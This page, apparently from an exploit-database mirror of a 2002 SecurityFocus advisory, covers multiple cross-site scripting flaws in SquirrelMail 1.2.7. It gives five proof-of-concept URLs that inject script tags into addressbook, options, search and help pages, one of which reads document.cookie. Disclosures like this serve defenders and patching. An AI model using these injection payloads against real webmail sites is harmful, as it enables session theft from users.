header-logo
Suggest Exploit
vendor:
SquirrelMail
by:
SecurityFocus
7.5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: SquirrelMail
Affected Version From: 1.2.2007
Affected Version To: 1.2.2007
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Unix
2002

SquirrelMail Multiple Cross Site Scripting Vulnerabilities

Multiple cross site scripting vulnerabilities have been discovered in various PHP scripts included with SquirrelMail. By including embedded commands into a malicious link, it is possible for an attacker to execute HTML and script code on a web client in the context of the site hosting the webmail system.

Mitigation:

Input validation should be used to ensure that user supplied data is not used to generate malicious HTML or script code.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5763/info

SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems.

Multiple cross site scripting vulnerabilities have been discovered in various PHP scripts included with SquirrelMail. By including embedded commands into a malicious link, it is possible for an attacker to execute HTML and script code on a web client in the context of the site hosting the webmail system.

This issue was reported for SquirrelMail 1.2.7, earlier versions may also be affected. 


http://<VULNERABLE
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri
pt><!--

http://<VULNERABLE
SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha
t=x&where=BODY&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b
oop!')</script>&submit=Search

http://<VULNERABLE
SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>

Navigation

Suggest Exploit

Services By CQR